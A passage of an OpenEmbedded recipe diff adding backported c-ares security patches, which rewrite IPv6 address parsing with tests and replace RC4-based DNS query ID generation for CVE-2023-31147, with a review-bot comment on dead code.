IN NO EVENT SHALL ISC BE LIABLE FOR +- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT +- * OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ++ * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS ++ * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES ++ * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE ++ * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL ++ * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR ++ * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ++ * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS ++ * SOFTWARE. + */ + + #include "ares_setup.h" +@@ -35,9 +36,6 @@ + + const struct ares_in6_addr ares_in6addr_any = { { { 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 } } }; + +- +-#ifndef HAVE_INET_NET_PTON +- + /* + * static int + * inet_net_pton_ipv4(src, dst, size) +@@ -60,7 +58,7 @@ const struct ares_in6_addr ares_in6addr_any = { { { 0,0,0,0,0,0,0,0,0,0,0,0,0,0, + * Paul Vixie (ISC), June 1996 + */ + static int +-inet_net_pton_ipv4(const char *src, unsigned char *dst, size_t size) ++ares_inet_net_pton_ipv4(const char *src, unsigned char *dst, size_t size) + { + static const char xdigits[] = "0123456789abcdef"; + static const char digits[] = "0123456789"; +@@ -261,19 +259,14 @@ getv4(const char *src, unsigned char *dst, int *bitsp) + } + + static int +-inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) ++ares_inet_pton6(const char *src, unsigned char *dst) + { + static const char xdigits_l[] = "0123456789abcdef", +- xdigits_u[] = "0123456789ABCDEF"; ++ xdigits_u[] = "0123456789ABCDEF"; + unsigned char tmp[NS_IN6ADDRSZ], *tp, *endp, *colonp; + const char *xdigits, *curtok; +- int ch, 
saw_xdigit; ++ int ch, saw_xdigit, count_xdigit; + unsigned int val; +- int digits; +- int bits; +- size_t bytes; +- int words; +- int ipv4; + + memset((tp = tmp), '\0', NS_IN6ADDRSZ); + endp = tp + NS_IN6ADDRSZ; +@@ -283,22 +276,22 @@ inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) + if (*++src != ':') + goto enoent; + curtok = src; +- saw_xdigit = 0; ++ saw_xdigit = count_xdigit = 0; + val = 0; +- digits = 0; +- bits = -1; +- ipv4 = 0; + while ((ch = *src++) != '\0') { + const char *pch; + + if ((pch = strchr((xdigits = xdigits_l), ch)) == NULL) + pch = strchr((xdigits = xdigits_u), ch); + if (pch != NULL) { ++ if (count_xdigit >= 4) ++ goto enoent; + val <<= 4; +- val |= aresx_sztoui(pch - xdigits); +- if (++digits > 4) ++ val |= (pch - xdigits); ++ if (val > 0xffff) + goto enoent; + saw_xdigit = 1; ++ count_xdigit++; + continue; + } + if (ch == ':') { +@@ -308,78 +301,107 @@ inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) + goto enoent; + colonp = tp; + continue; +- } else if (*src == '\0') ++ } else if (*src == '\0') { + goto enoent; ++ } + if (tp + NS_INT16SZ > endp) +- return (0); +- *tp++ = (unsigned char)((val >> 8) & 0xff); +- *tp++ = (unsigned char)(val & 0xff); ++ goto enoent; ++ *tp++ = (unsigned char) (val >> 8) & 0xff; ++ *tp++ = (unsigned char) val & 0xff; + saw_xdigit = 0; +- digits = 0; ++ count_xdigit = 0; + val = 0; + continue; + } + if (ch == '.' && ((tp + NS_INADDRSZ) <= endp) && +- getv4(curtok, tp, &bits) > 0) { +- tp += NS_INADDRSZ; ++ ares_inet_net_pton_ipv4(curtok, tp, INADDRSZ) > 0) { ++ tp += INADDRSZ; + saw_xdigit = 0; +- ipv4 = 1; ++ count_xdigit = 0; + break; /* '\0' was seen by inet_pton4(). 
*/ + } +- if (ch == '/' && getbits(src, &bits) > 0) +- break; + goto enoent; + } + if (saw_xdigit) { + if (tp + NS_INT16SZ > endp) + goto enoent; +- *tp++ = (unsigned char)((val >> 8) & 0xff); +- *tp++ = (unsigned char)(val & 0xff); ++ *tp++ = (unsigned char) (val >> 8) & 0xff; ++ *tp++ = (unsigned char) val & 0xff; + } +- if (bits == -1) +- bits = 128; +- +- words = (bits + 15) / 16; +- if (words < 2) +- words = 2; +- if (ipv4) +- words = 8; +- endp = tmp + 2 * words; +- + if (colonp != NULL) { + /* + * Since some memmove()'s erroneously fail to handle + * overlapping regions, we'll do the shift by hand. + */ +- const ares_ssize_t n = tp - colonp; +- ares_ssize_t i; ++ const int n = tp - colonp; ++ int i; + + if (tp == endp) + goto enoent; + for (i = 1; i <= n; i++) { +- *(endp - i) = *(colonp + n - i); +- *(colonp + n - i) = 0; ++ endp[- i] = colonp[n - i]; ++ colonp[n - i] = 0; + } + tp = endp; + } + if (tp != endp) + goto enoent; + +- bytes = (bits + 7) / 8; +- if (bytes > size) +- goto emsgsize; +- memcpy(dst, tmp, bytes); +- return (bits); ++ memcpy(dst, tmp, NS_IN6ADDRSZ); ++ return (1); + +- enoent: ++enoent: + SET_ERRNO(ENOENT); + return (-1); + +- emsgsize: ++emsgsize: + SET_ERRNO(EMSGSIZE); + return (-1); + } + ++static int ++ares_inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) ++{ ++ struct ares_in6_addr in6; ++ int ret; ++ int bits; ++ size_t bytes; ++ char buf[INET6_ADDRSTRLEN + sizeof("/128")]; ++ char *sep; ++ const char *errstr; ++ ++ if (strlen(src) >= sizeof buf) { ++ SET_ERRNO(EMSGSIZE); ++ return (-1); ++ } ++ strncpy(buf, src, sizeof buf); ++ ++ sep = strchr(buf, '/'); ++ if (sep != NULL) ++ *sep++ = '\0'; ++ ++ ret = ares_inet_pton6(buf, (unsigned char *)&in6); ++ if (ret != 1) ++ return (-1); ++ ++ if (sep == NULL) ++ bits = 128; ++ else { ++ if (!getbits(sep, &bits)) { ++ SET_ERRNO(ENOENT); ++ return (-1); ++ } ++ } ++ ++ bytes = (bits + 7) / 8; ++ if (bytes > size) { ++ SET_ERRNO(EMSGSIZE); ++ return (-1); ++ } ++ 
memcpy(dst, &in6, bytes); ++ return (bits); ++} ++ + /* + * int + * inet_net_pton(af, src, dst, size) +@@ -403,18 +425,15 @@ ares_inet_net_pton(int af, const char *src, void *dst, size_t size) + { + switch (af) { + case AF_INET: +- return (inet_net_pton_ipv4(src, dst, size)); ++ return (ares_inet_net_pton_ipv4(src, dst, size)); + case AF_INET6: +- return (inet_net_pton_ipv6(src, dst, size)); ++ return (ares_inet_net_pton_ipv6(src, dst, size)); + default: + SET_ERRNO(EAFNOSUPPORT); + return (-1); + } + } + +-#endif /* HAVE_INET_NET_PTON */ +- +-#ifndef HAVE_INET_PTON + int ares_inet_pton(int af, const char *src, void *dst) + { + int result; +@@ -434,11 +453,3 @@ int ares_inet_pton(int af, const char *src, void *dst) + return 0; + return (result > -1 ? 1 : -1); + } +-#else /* HAVE_INET_PTON */ +-int ares_inet_pton(int af, const char *src, void *dst) +-{ +- /* just relay this to the underlying function */ +- return inet_pton(af, src, dst); +-} +- +-#endif +diff --git a/test/ares-test-internal.cc b/test/ares-test-internal.cc +index 96d4ede..161f0a5 100644 +--- a/test/ares-test-internal.cc ++++ b/test/ares-test-internal.cc +@@ -81,6 +81,7 @@ TEST_F(LibraryTest, InetPtoN) { + EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "12:34::ff/0", &a6, sizeof(a6))); + EXPECT_EQ(16 * 8, ares_inet_net_pton(AF_INET6, "12:34::ffff:0.2", &a6, sizeof(a6))); + EXPECT_EQ(16 * 8, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234", &a6, sizeof(a6))); ++ EXPECT_EQ(2, ares_inet_net_pton(AF_INET6, "0::00:00:00/2", &a6, sizeof(a6))); + + // Various malformed versions + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET, "", &a4, sizeof(a4))); +@@ -118,11 +119,9 @@ TEST_F(LibraryTest, InetPtoN) { + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, ":1234:1234:1234:1234:1234:1234:1234:1234", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, ":1234:1234:1234:1234:1234:1234:1234:1234:", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, 
"1234:1234:1234:1234:1234:1234:1234:1234:5678", &a6, sizeof(a6))); +- // TODO(drysdale): check whether the next two tests should give -1. +- EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678", &a6, sizeof(a6))); +- EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678:5678", &a6, sizeof(a6))); ++ EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678", &a6, sizeof(a6))); ++ EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678:5678", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:257.2.3.4", &a6, sizeof(a6))); +- EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:002.2.3.4", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.4.5.6", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.4.5", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.z", &a6, sizeof(a6))); +-- +2.25.1 + diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch new file mode 100644 index 0000000000..bbd6aa0aec --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch 
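Review bot: The new `ares_inet_net_pton_ipv6` declares `const char *errstr;` and never uses it, and `ares_inet_pton6` keeps the `emsgsize:` label although the only visible `goto emsgsize` is on a removed line. As far as the hunks show, both are dead code and will warn under `-Wall` (unused variable, unused label). I would drop the `errstr` declaration and the `emsgsize:` block (`SET_ERRNO(EMSGSIZE); return (-1);`) from `ares_inet_pton6`. A few lines of that function lie between the hunks and are not shown, so confirm that nothing there still jumps to the label.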
@@ -0,0 +1,717 @@ +From c543406f44fa070ea101d4d4b173c2c88af0c2a5 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 22 May 2023 06:51:06 -0400 +Subject: [PATCH] Merge pull request from GHSA-8r8p-23f3-64c2 + +* segment random number generation into own file + +* abstract random code to make it more modular so we can have multiple backends + +* rand: add support for arc4random_buf() and also direct CARES_RANDOM_FILE reading + +* autotools: fix detection of arc4random_buf + +* rework initial rc4 seed for PRNG as last fallback + +* rc4: more proper implementation, simplified for clarity + +* clarifications + +CVE: CVE-2023-31147 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/823df3b989e59465d17b0a2eb1239a5fc048b4e5] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- + CMakeLists.txt | 2 + + configure.ac | 1 + + m4/cares-functions.m4 | 85 +++++++++++ + src/lib/Makefile.inc | 1 + + src/lib/ares_config.h.cmake | 3 + + src/lib/ares_destroy.c | 3 + + src/lib/ares_init.c | 82 ++--------- + src/lib/ares_private.h | 19 ++- + src/lib/ares_query.c | 36 +---- + src/lib/ares_rand.c | 274 ++++++++++++++++++++++++++++++++++++ + 10 files changed, 387 insertions(+), 119 deletions(-) + create mode 100644 src/lib/ares_rand.c + +diff --git a/CMakeLists.txt b/CMakeLists.txt +index 194485a..1fb9af5 100644 +--- a/CMakeLists.txt ++++ b/CMakeLists.txt +@@ -386,6 +386,8 @@ CHECK_SYMBOL_EXISTS (strncasecmp "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNCAS + CHECK_SYMBOL_EXISTS (strncmpi "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNCMPI) + CHECK_SYMBOL_EXISTS (strnicmp "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNICMP) + CHECK_SYMBOL_EXISTS (writev "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_WRITEV) ++CHECK_SYMBOL_EXISTS (arc4random_buf "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_ARC4RANDOM_BUF) ++ + + # On Android, the system headers may define __system_property_get(), but excluded + # from libc. We need to perform a link test instead of a header/symbol test. 
+diff --git a/configure.ac b/configure.ac +index 1d0fb5c..9a76369 100644 +--- a/configure.ac ++++ b/configure.ac +@@ -683,6 +683,7 @@ CARES_CHECK_FUNC_STRNCASECMP + CARES_CHECK_FUNC_STRNCMPI + CARES_CHECK_FUNC_STRNICMP + CARES_CHECK_FUNC_WRITEV ++CARES_CHECK_FUNC_ARC4RANDOM_BUF + + + dnl check for AF_INET6 +diff --git a/m4/cares-functions.m4 b/m4/cares-functions.m4 +index 0f3992c..d4f4f99 100644 +--- a/m4/cares-functions.m4 ++++ b/m4/cares-functions.m4 +@@ -3753,3 +3753,88 @@ AC_DEFUN([CARES_CHECK_FUNC_WRITEV], [ + ac_cv_func_writev="no" + fi + ]) ++ ++dnl CARES_CHECK_FUNC_ARC4RANDOM_BUF ++dnl ------------------------------------------------- ++dnl Verify if arc4random_buf is available, prototyped, and ++dnl can be compiled. If all of these are true, and ++dnl usage has not been previously disallowed with ++dnl shell variable cares_disallow_arc4random_buf, then ++dnl HAVE_ARC4RANDOM_BUF will be defined. ++ ++AC_DEFUN([CARES_CHECK_FUNC_ARC4RANDOM_BUF], [ ++ AC_REQUIRE([CARES_INCLUDES_STDLIB])dnl ++ # ++ tst_links_arc4random_buf="unknown" ++ tst_proto_arc4random_buf="unknown" ++ tst_compi_arc4random_buf="unknown" ++ tst_allow_arc4random_buf="unknown" ++ # ++ AC_MSG_CHECKING([if arc4random_buf can be linked]) ++ AC_LINK_IFELSE([ ++ AC_LANG_FUNC_LINK_TRY([arc4random_buf]) ++ ],[ ++ AC_MSG_RESULT([yes]) ++ tst_links_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_links_arc4random_buf="no" ++ ]) ++ # ++ if test "$tst_links_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf is prototyped]) ++ AC_EGREP_CPP([arc4random_buf],[ ++ $cares_includes_stdlib ++ ],[ ++ AC_MSG_RESULT([yes]) ++ tst_proto_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_proto_arc4random_buf="no" ++ ]) ++ fi ++ # ++ if test "$tst_proto_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf is compilable]) ++ AC_COMPILE_IFELSE([ ++ AC_LANG_PROGRAM([[ ++ $cares_includes_stdlib ++ ]],[[ ++ arc4random_buf(NULL, 0); ++ return 1; ++ ]]) ++ ],[ ++ 
AC_MSG_RESULT([yes]) ++ tst_compi_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_compi_arc4random_buf="no" ++ ]) ++ fi ++ # ++ if test "$tst_compi_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf usage allowed]) ++ if test "x$cares_disallow_arc4random_buf" != "xyes"; then ++ AC_MSG_RESULT([yes]) ++ tst_allow_arc4random_buf="yes" ++ else ++ AC_MSG_RESULT([no]) ++ tst_allow_arc4random_buf="no" ++ fi ++ fi ++ # ++ AC_MSG_CHECKING([if arc4random_buf might be used]) ++ if test "$tst_links_arc4random_buf" = "yes" && ++ test "$tst_proto_arc4random_buf" = "yes" && ++ test "$tst_compi_arc4random_buf" = "yes" && ++ test "$tst_allow_arc4random_buf" = "yes"; then ++ AC_MSG_RESULT([yes]) ++ AC_DEFINE_UNQUOTED(HAVE_ARC4RANDOM_BUF, 1, ++ [Define to 1 if you have the arc4random_buf function.]) ++ ac_cv_func_arc4random_buf="yes" ++ else ++ AC_MSG_RESULT([no]) ++ ac_cv_func_arc4random_buf="no" ++ fi ++]) ++ +diff --git a/src/lib/Makefile.inc b/src/lib/Makefile.inc +index a3b060c..72a7673 100644 +--- a/src/lib/Makefile.inc ++++ b/src/lib/Makefile.inc +@@ -45,6 +45,7 @@ CSOURCES = ares__addrinfo2hostent.c \ + ares_platform.c \ + ares_process.c \ + ares_query.c \ ++ ares_rand.c \ + ares_search.c \ + ares_send.c \ + ares_strcasecmp.c \ +diff --git a/src/lib/ares_config.h.cmake b/src/lib/ares_config.h.cmake +index fddb785..798820a 100644 +--- a/src/lib/ares_config.h.cmake ++++ b/src/lib/ares_config.h.cmake +@@ -346,6 +346,9 @@ + /* Define to 1 if you need the memory.h header file even with stdlib.h */ + #cmakedefine NEED_MEMORY_H + ++/* Define if have arc4random_buf() */ ++#cmakedefine HAVE_ARC4RANDOM_BUF ++ + /* a suitable file/device to read random data from */ + #cmakedefine CARES_RANDOM_FILE "@CARES_RANDOM_FILE@" + +diff --git a/src/lib/ares_destroy.c b/src/lib/ares_destroy.c +index fed2009..0447af4 100644 +--- a/src/lib/ares_destroy.c ++++ b/src/lib/ares_destroy.c +@@ -90,6 +90,9 @@ void ares_destroy(ares_channel channel) + if (channel->resolvconf_path) 
+ ares_free(channel->resolvconf_path); + ++ if (channel->rand_state) ++ ares__destroy_rand_state(channel->rand_state); ++ + ares_free(channel); + } + +diff --git a/src/lib/ares_init.c b/src/lib/ares_init.c +index de5d86c..2607ed6 100644 +--- a/src/lib/ares_init.c ++++ b/src/lib/ares_init.c +@@ -72,7 +72,6 @@ static int config_nameserver(struct server_state **servers, int *nservers, + static int set_search(ares_channel channel, const char *str); + static int set_options(ares_channel channel, const char *str); + static const char *try_option(const char *p, const char *q, const char *opt); +-static int init_id_key(rc4_key* key,int key_data_len); + + static int config_sortlist(struct apattern **sortlist, int *nsort, + const char *str); +@@ -149,6 +148,7 @@ int ares_init_options(ares_channel *channelptr, struct ares_options *options, + channel->sock_funcs = NULL; + channel->sock_func_cb_data = NULL; + channel->resolvconf_path = NULL; ++ channel->rand_state = NULL; + + channel->last_server = 0; + channel->last_timeout_processed = (time_t)now.tv_sec; +@@ -202,9 +202,13 @@ int ares_init_options(ares_channel *channelptr, struct ares_options *options, + /* Generate random key */ + + if (status == ARES_SUCCESS) { +- status = init_id_key(&channel->id_key, ARES_ID_KEY_LEN); ++ channel->rand_state = ares__init_rand_state(); ++ if (channel->rand_state == NULL) { ++ status = ARES_ENOMEM; ++ } ++ + if (status == ARES_SUCCESS) +- channel->next_id = ares__generate_new_id(&channel->id_key); ++ channel->next_id = ares__generate_new_id(channel->rand_state); + else + DEBUGF(fprintf(stderr, "Error: init_id_key failed: %s\n", + ares_strerror(status))); +@@ -224,6 +228,8 @@ done: + ares_free(channel->lookups); + if(channel->resolvconf_path) + ares_free(channel->resolvconf_path); ++ if (channel->rand_state) ++ ares__destroy_rand_state(channel->rand_state); + ares_free(channel); + return status; + } +@@ -2495,76 +2501,6 @@ static int sortlist_alloc(struct apattern **sortlist, int *nsort, + 
return 1; + } + +-/* initialize an rc4 key. If possible a cryptographically secure random key +- is generated using a suitable function (for example win32's RtlGenRandom as +- described in +- http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx +- otherwise the code defaults to cross-platform albeit less secure mechanism +- using rand +-*/ +-static void randomize_key(unsigned char* key,int key_data_len) +-{ +- int randomized = 0; +- int counter=0; +-#ifdef WIN32 +- BOOLEAN res; +- if (ares_fpSystemFunction036) +- { +- res = (*ares_fpSystemFunction036) (key, key_data_len); +- if (res) +- randomized = 1; +- } +-#else /* !WIN32 */ +-#ifdef CARES_RANDOM_FILE +- FILE *f = fopen(CARES_RANDOM_FILE, "rb"); +- if(f) { +- setvbuf(f, NULL, _IONBF, 0); +- counter = aresx_uztosi(fread(key, 1, key_data_len, f)); +- fclose(f); +- } +-#endif +-#endif /* WIN32 */ +- +- if (!randomized) { +- for (;counter<key_data_len;counter++) +- key[counter]=(unsigned char)(rand() % 256); /* LCOV_EXCL_LINE */ +- } +-} +- +-static int init_id_key(rc4_key* key,int key_data_len) +-{ +- unsigned char index1; +- unsigned char index2; +- unsigned char* state; +- short counter; +- unsigned char *key_data_ptr = 0; +- +- key_data_ptr = ares_malloc(key_data_len); +- if (!key_data_ptr) +- return ARES_ENOMEM; +- memset(key_data_ptr, 0, key_data_len); +- +- state = &key->state[0]; +- for(counter = 0; counter < 256; counter++) +- /* unnecessary AND but it keeps some compilers happier */ +- state[counter] = (unsigned char)(counter & 0xff); +- randomize_key(key->state,key_data_len); +- key->x = 0; +- key->y = 0; +- index1 = 0; +- index2 = 0; +- for(counter = 0; counter < 256; counter++) +- { +- index2 = (unsigned char)((key_data_ptr[index1] + state[counter] + +- index2) % 256); +- ARES_SWAP_BYTE(&state[counter], &state[index2]); +- +- index1 = (unsigned char)((index1 + 1) % key_data_len); +- } +- ares_free(key_data_ptr); +- return ARES_SUCCESS; +-} +- + void ares_set_local_ip4(ares_channel 
channel, unsigned int local_ip) + { + channel->local_ip4 = local_ip; +diff --git a/src/lib/ares_private.h b/src/lib/ares_private.h +index 60d69e0..518b5c3 100644 +--- a/src/lib/ares_private.h ++++ b/src/lib/ares_private.h +@@ -101,8 +101,6 @@ W32_FUNC const char *_w32_GetHostsFile (void); + + #endif + +-#define ARES_ID_KEY_LEN 31 +- + #include "ares_ipv6.h" + #include "ares_llist.h" + +@@ -262,12 +260,8 @@ struct apattern { + unsigned short type; + }; + +-typedef struct rc4_key +-{ +- unsigned char state[256]; +- unsigned char x; +- unsigned char y; +-} rc4_key; ++struct ares_rand_state; ++typedef struct ares_rand_state ares_rand_state; + + struct ares_channeldata { + /* Configuration data */ +@@ -302,8 +296,8 @@ struct ares_channeldata { + + /* ID to use for next query */ + unsigned short next_id; +- /* key to use when generating new ids */ +- rc4_key id_key; ++ /* random state to use when generating new ids */ ++ ares_rand_state *rand_state; + + /* Generation number to use for the next TCP socket open/close */ + int tcp_connection_generation; +@@ -359,7 +353,10 @@ void ares__close_sockets(ares_channel channel, struct server_state *server); + int ares__get_hostent(FILE *fp, int family, struct hostent **host); + int ares__read_line(FILE *fp, char **buf, size_t *bufsize); + void ares__free_query(struct query *query); +-unsigned short ares__generate_new_id(rc4_key* key); ++ ++ares_rand_state *ares__init_rand_state(void); ++void ares__destroy_rand_state(ares_rand_state *state); ++unsigned short ares__generate_new_id(ares_rand_state *state); + struct timeval ares__tvnow(void); + int ares__expand_name_validated(const unsigned char *encoded, + const unsigned char *abuf, +diff --git a/src/lib/ares_query.c b/src/lib/ares_query.c +index 508274d..42323be 100644 +--- a/src/lib/ares_query.c ++++ b/src/lib/ares_query.c +@@ -33,32 +33,6 @@ struct qquery { + + static void qcallback(void *arg, int status, int timeouts, unsigned char *abuf, int alen); + +-static void rc4(rc4_key* 
key, unsigned char *buffer_ptr, int buffer_len) +-{ +- unsigned char x; +- unsigned char y; +- unsigned char* state; +- unsigned char xorIndex; +- int counter; +- +- x = key->x; +- y = key->y; +- +- state = &key->state[0]; +- for(counter = 0; counter < buffer_len; counter ++) +- { +- x = (unsigned char)((x + 1) % 256); +- y = (unsigned char)((state[x] + y) % 256); +- ARES_SWAP_BYTE(&state[x], &state[y]); +- +- xorIndex = (unsigned char)((state[x] + state[y]) % 256); +- +- buffer_ptr[counter] = (unsigned char)(buffer_ptr[counter]^state[xorIndex]); +- } +- key->x = x; +- key->y = y; +-} +- + static struct query* find_query_by_id(ares_channel channel, unsigned short id) + { + unsigned short qid; +@@ -78,7 +52,6 @@ static struct query* find_query_by_id(ares_channel channel, unsigned short id) + return NULL; + } + +- + /* a unique query id is generated using an rc4 key. Since the id may already + be used by a running query (as infrequent as it may be), a lookup is + performed per id generation. In practice this search should happen only +@@ -89,19 +62,12 @@ static unsigned short generate_unique_id(ares_channel channel) + unsigned short id; + + do { +- id = ares__generate_new_id(&channel->id_key); ++ id = ares__generate_new_id(channel->rand_state); + } while (find_query_by_id(channel, id)); + + return (unsigned short)id; + } + +-unsigned short ares__generate_new_id(rc4_key* key) +-{ +- unsigned short r=0; +- rc4(key, (unsigned char *)&r, sizeof(r)); +- return r; +-} +- + void ares_query(ares_channel channel, const char *name, int dnsclass, + int type, ares_callback callback, void *arg) + { +diff --git a/src/lib/ares_rand.c b/src/lib/ares_rand.c +new file mode 100644 +index 0000000..a564bc2 +--- /dev/null ++++ b/src/lib/ares_rand.c +@@ -0,0 +1,274 @@ ++/* Copyright 1998 by the Massachusetts Institute of Technology. 
++ * Copyright (C) 2007-2013 by Daniel Stenberg ++ * ++ * Permission to use, copy, modify, and distribute this ++ * software and its documentation for any purpose and without ++ * fee is hereby granted, provided that the above copyright ++ * notice appear in all copies and that both that copyright ++ * notice and this permission notice appear in supporting ++ * documentation, and that the name of M.I.T. not be used in ++ * advertising or publicity pertaining to distribution of the ++ * software without specific, written prior permission. ++ * M.I.T. makes no representations about the suitability of ++ * this software for any purpose. It is provided "as is" ++ * without express or implied warranty. ++ */ ++ ++#include "ares_setup.h" ++#include "ares.h" ++#include "ares_private.h" ++#include "ares_nowarn.h" ++#include <stdlib.h> ++ ++typedef enum { ++ ARES_RAND_OS = 1, /* OS-provided such as RtlGenRandom or arc4random */ ++ ARES_RAND_FILE = 2, /* OS file-backed random number generator */ ++ ARES_RAND_RC4 = 3 /* Internal RC4 based PRNG */ ++} ares_rand_backend; ++ ++typedef struct ares_rand_rc4 ++{ ++ unsigned char S[256]; ++ size_t i; ++ size_t j; ++} ares_rand_rc4; ++ ++struct ares_rand_state ++{ ++ ares_rand_backend type; ++ union { ++ FILE *rand_file; ++ ares_rand_rc4 rc4; ++ } state; ++}; ++ ++ ++/* Define RtlGenRandom = SystemFunction036. This is in advapi32.dll. There is ++ * no need to dynamically load this, other software used widely does not. 
++ * http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx ++ * https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-rtlgenrandom ++ */ ++#ifdef _WIN32 ++BOOLEAN WINAPI SystemFunction036(PVOID RandomBuffer, ULONG RandomBufferLength); ++# ifndef RtlGenRandom ++# define RtlGenRandom(a,b) SystemFunction036(a,b) ++# endif ++#endif ++ ++ ++#define ARES_RC4_KEY_LEN 32 /* 256 bits */ ++ ++static unsigned int ares_u32_from_ptr(void *addr) ++{ ++ if (sizeof(void *) == 8) { ++ return (unsigned int)((((size_t)addr >> 32) & 0xFFFFFFFF) | ((size_t)addr & 0xFFFFFFFF)); ++ } ++ return (unsigned int)((size_t)addr & 0xFFFFFFFF); ++} ++ ++ ++/* initialize an rc4 key as the last possible fallback. */ ++static void ares_rc4_generate_key(ares_rand_rc4 *rc4_state, unsigned char *key, size_t key_len) ++{ ++ size_t i; ++ size_t len = 0; ++ unsigned int data; ++ struct timeval tv; ++ ++ if (key_len != ARES_RC4_KEY_LEN) ++ return; ++ ++ /* Randomness is hard to come by. Maybe the system randomizes heap and stack addresses. ++ * Maybe the current timestamp give us some randomness. 
++ * Use rc4_state (heap), &i (stack), and ares__tvnow() ++ */ ++ data = ares_u32_from_ptr(rc4_state); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ data = ares_u32_from_ptr(&i); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ tv = ares__tvnow(); ++ data = (unsigned int)((tv.tv_sec | tv.tv_usec) & 0xFFFFFFFF); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ srand(ares_u32_from_ptr(rc4_state) | ares_u32_from_ptr(&i) | (unsigned int)((tv.tv_sec | tv.tv_usec) & 0xFFFFFFFF)); ++ ++ for (i=len; i<key_len; i++) { ++ key[i]=(unsigned char)(rand() % 256); /* LCOV_EXCL_LINE */ ++ } ++} ++ ++ ++static void ares_rc4_init(ares_rand_rc4 *rc4_state) ++{ ++ unsigned char key[ARES_RC4_KEY_LEN]; ++ size_t i; ++ size_t j; ++ ++ ares_rc4_generate_key(rc4_state, key, sizeof(key)); ++ ++ for (i = 0; i < sizeof(rc4_state->S); i++) { ++ rc4_state->S[i] = i & 0xFF; ++ } ++ ++ for(i = 0, j = 0; i < 256; i++) { ++ j = (j + rc4_state->S[i] + key[i % sizeof(key)]) % 256; ++ ARES_SWAP_BYTE(&rc4_state->S[i], &rc4_state->S[j]); ++ } ++ ++ rc4_state->i = 0; ++ rc4_state->j = 0; ++} ++ ++/* Just outputs the key schedule, no need to XOR with any data since we have none */ ++static void ares_rc4_prng(ares_rand_rc4 *rc4_state, unsigned char *buf, int len) ++{ ++ unsigned char *S = rc4_state->S; ++ size_t i = rc4_state->i; ++ size_t j = rc4_state->j; ++ size_t cnt; ++ ++ for (cnt=0; cnt<len; cnt++) { ++ i = (i + 1) % 256; ++ j = (j + S[i]) % 256; ++ ++ ARES_SWAP_BYTE(&S[i], &S[j]); ++ buf[cnt] = S[(S[i] + S[j]) % 256]; ++ } ++ ++ rc4_state->i = i; ++ rc4_state->j = j; ++} ++ 